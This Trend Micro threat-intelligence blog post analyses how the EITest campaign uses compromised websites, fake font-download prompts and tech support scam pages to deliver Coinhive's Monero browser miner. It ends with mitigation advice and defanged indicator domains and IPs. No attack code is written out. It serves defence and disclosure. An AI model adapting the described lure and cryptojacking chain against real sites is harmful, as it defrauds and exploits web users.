• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Bad Sites   »   EITest Campaign Uses Tech Support Scams to Deliver Coinhive’s Monero Miner

EITest Campaign Uses Tech Support Scams to Deliver Coinhive’s Monero Miner

  • Posted on:September 22, 2017 at 9:01 am
  • Posted in:Bad Sites
  • Author:
    Joseph C Chen (Fraud Researcher)
0

We’ve uncovered the notorious EITest campaign delivering a JavaScript (JS) cryptocurrency miner (detected by Trend Micro as HKTL_COINMINE) using tech support scams as a social engineering lure. These are fraud activities impersonating legitimate technical support services, conning unwitting victims to avail/pay for these services (or hand out financial data), by scaring them that their machine has been infected with malware, for instance.

The EITest campaign’s main arsenal is compromised websites. Its activity can be traced to as early as 2014 and once used the Angler exploit kit to deliver ransomware. Starting January 2017, it has eschewed exploit kits in favor of “HoeflerText” (a popular font) phishing attacks or or tech support scams. In a month, we identified 990 compromised websites injected with a malicious script that diverts the would-be victim to a website related to the tech support scam. Of late, though, the campaign has added the Coinhive JS miner into ongoing attacks, turning the victim’s computer into a Monero cryptocurrency miner. Analysis also revealed that this JS cryptocurrency miner is the same “Coinhive” JS miner found embedded in The Pirate Bay’s website.



Figure 1: Timeline of observed Coinhive-related traffic
Note: We saw that ElTest started incorporating cryptocurrency mining on September 19 (highlighted).

Figure 2: Country distribution of EITest’s tech support scam

Attack Chain
When a user accesses one of the compromised websites, the website first identifies the browser type via User-Agent information through the HTTP request. It then injects a phishing script directly into the webpage if the user’s browser is Chrome. Our initial tests show that the attack doesn’t affect Firefox.

The phishing script is coded to notify the user to download the Hoefler Text font to properly display the page, but it actually downloads a malicious executable file. EITest takes this up a notch: If the user’s browser is Internet Explorer, he is redirected to a tech support phishing page containing the Coinhive Monero-mining JS script. Below is the snapshot of the malicious script that diverts the user to a traffic direction system (TDS)—a tool that manages redirection of traffic—that then reroutes to the tech support scam website.


Figure 3: Screenshot of the compromised website’s malicious script (Redirect URL of TDS highlighted)

Figure 4: Screenshot of the tech support scam webpage 

The tech support scam webpage poses as a legitimate Microsoft Windows notification, alerting victims that the system has been infected with malware. It will prod the user to call their “technical department” to resolve the issue. Behind the scenes, however, the webpage will load script from Coinhive’s server and launch a JS cryptocurrency miner. Users won’t notice that their system has been affected apart from system lags or performance issues.


Figure 5: How Coinhive’s JS cryptocurrency miner is injected (left), and how it affects the user’s system (right)

Indeed, cybercriminal cryptocurrency mining is gaining traction because it’s an apparent non-zero-sum game. Bad guys can profit even if they don’t invest much on creating their own malware—they can just misuse existing grayware. It also gives them the pseudonymity to keep law enforcement away from their activities.

For end users, however, the impact isn’t just about system wear-and-tear or performance issues. From January 1 to June 24, for instance, our sensors noted that 20% of cryptocurrency-mining activities entailed web- and network-based attacks. From cross-site scripting and remote code execution to brute force attacks and SQL injection, intrusive and malicious cryptocurrency mining can threaten the availability and security of a network or system, and the data stored on them. Worse, victims become part of the problem.

Follow best practices to mitigate cryptocurrency-mining-related attacks. Regularly update and patch your system (including your browsers) and be more prudent against socially engineered attack vectors such as suspicious websites and email attachments. You can consider using JS-blocking applications to prevent scripts like Coinhive’s from running. There’s also a silver lining. Given the nature of Coinhive’s Monero-mining script, it has no persistence mechanism—closing the website/browser will stop the script from running.

Trend Micro Solutions
Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security protect end users and businesses from these threats by detecting and blocking malicious files and all related URLs. Trend Micro™ Smart Protection Suites deliver several capabilities like high fidelity machine learning, web reputation services, behavior monitoring and application control that minimize the impact of this threat.

 

Indicators of Compromise:
Domains and IP address related to the TDS Server:

  • mackenzie190912[.]gq
  • mackenzie19091[.]gq
  • 162[.]244[.]35[.]210

Domain and IP addresses related to the tech support scam:

  • angel200911[.]ml
  • 162[.]244[.]35[.]35
  • 162[.]244[.]35[.]36

With additional insights/analysis from Samuel P. Wang

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: cryptocurrencycryptocurrency minerEITestTech Support Scam

Featured Stories

  • systemd Vulnerability Leads to Denial of Service on Linux
  • qkG Filecoder: Self-Replicating, Document-Encrypting Ransomware
  • Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability
  • A Closer Look at North Korea’s Internet
  • From Cybercrime to Cyberpropaganda

Security Predictions for 2019

  • Our security predictions for 2019 are based on our experts’ analysis of the progress of current and emerging technologies, user behavior, and market trends, and their impact on the threat landscape. We have categorized them according to the main areas that are likely to be affected, given the sprawling nature of the technological and sociopolitical changes under consideration.
    Read our security predictions for 2019.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Obfuscation Tools Found in the Capesand Exploit Kit Possibly Used in “KurdishCoder” Campaign
  • Mobile Cyberespionage Campaign Distributed Through CallerSpy Mounts Initial Phase of a Targeted Attack
  • Operation ENDTRADE: Finding Multi-Stage Backdoors that TICK
  • Patched GIF Processing Vulnerability CVE-2019-11932 Still Afflicts Multiple Mobile Apps
  • Mac Backdoor Linked to Lazarus Targets Korean Users

Popular Posts

  • Mac Backdoor Linked to Lazarus Targets Korean Users
  • New Magecart Attack Delivered Through Compromised Advertising Supply Chain
  • 49 Disguised Adware Apps With Optimized Evasion Features Found on Google Play
  • September Patch Tuesday Bears More Remote Desktop Vulnerability Fixes and Two Zero-Days
  • Microsoft November 2019 Patch Tuesday Reveals 74 Patches Before Major Windows Update

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.